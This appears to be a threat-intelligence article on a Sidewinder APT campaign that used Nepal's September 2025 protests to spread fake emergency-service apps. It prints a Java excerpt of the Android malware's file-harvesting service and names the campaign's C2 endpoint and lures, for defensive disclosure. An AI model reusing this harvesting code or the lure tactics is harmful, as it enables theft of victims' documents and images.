“`html
The surge of extensive demonstrations throughout Nepal in early September 2025 created an optimal setting for a complex campaign led by the Sidewinder APT collective.
As protesters rallied against governmental regulations and social media limitations, malicious actors took advantage of the chaos to spread harmful applications disguised as credible emergency services.
Individuals seeking real-time updates or help were lured by convincing imitations of Nepali officials, only to end up installing malware designed to extract sensitive information from both mobile and Windows platforms.
The operation of Sidewinder depends on a two-fold delivery method. On Android devices, victims encounter phishing sites imitating the Nepalese Emergency Service login.
.webp)
Once credentials are submitted, the website redirects users to an APK download—usually labeled Gen_Ashok_Sigdel_Live.apk—which individuals install believing they are accessing live updates.
.webp)
In the meantime, Windows users retrieve EmergencyApp.exe from a duplicate Emergency Helpline site (Figure 6). Both executable files demand extensive permissions—access to the file system, microphone, and camera—to enable data extraction.
Analysts from StrikeReady Labs observed the group’s intentional incorporation of geopolitical occurrences to enhance engagement, embedding the harmful payload within fake content sourced from reputable organizations like Al Jazeera.
.webp)
These decoys enhance the operation’s credibility and assist the malware in evading superficial scrutiny by non-technical individuals. After installation, the mobile backdoor initiates a service that filters document and image files for extraction.
The Windows counterpart functions in a similar manner, generating background tasks that collect files with extensions like .docx, .pdf, and .xlsx.
Infection Mechanism and Permission Abuse
A detailed inspection of the Android sample uncovers a multi-threaded FileUploadService class responsible for data theft.
.webp)
Upon activation, the service sets up an ExecutorService with a thread pool comprising fifteen workers. Each worker inspects device storage for files that match designated document and image extensions:
public class FileUploadService extends Service {
private static final int THREAD_COUNT = 15;
private final List docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
private final List imgExts = Arrays.asList(".jpg", ".png");
private ExecutorService executorService;
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
executorService = Executors.newFixedThreadPool(THREAD_COUNT);
scanAndUpload();
return START_STICKY;
}
private void scanAndUpload() {
for (String ext : docExts) {
// Launch tasks to upload matching files
executorService.submit(() -> uploadFiles(ext));
}
for (String ext : imgExts) {
executorService.submit(() -> uploadFiles(ext));
}
}
} Once files are identified, HTTP POST requests bundle them into multipart form data, employing a recognizable boundary marker (----qwerty) that becomes evident in the network capture.
.webp)
All stolen files are transmitted to https://playservicess.com/dtta/files.php, a command and control endpoint operated by Sidewinder. The infection is sustained through the foreground service notifications on Android and autostart registry entries on Windows.
By utilizing interfaces that appear legitimate and exploiting elevated permissions, Sidewinder effectively creates a covert infection channel capable of breaching both corporate and personal systems.
Cybersecurity teams should remain vigilant for recognized IOC domains (e.g., playservicess.com), dubious APK installations, and unusual outbound traffic that includes multipart payloads.
“`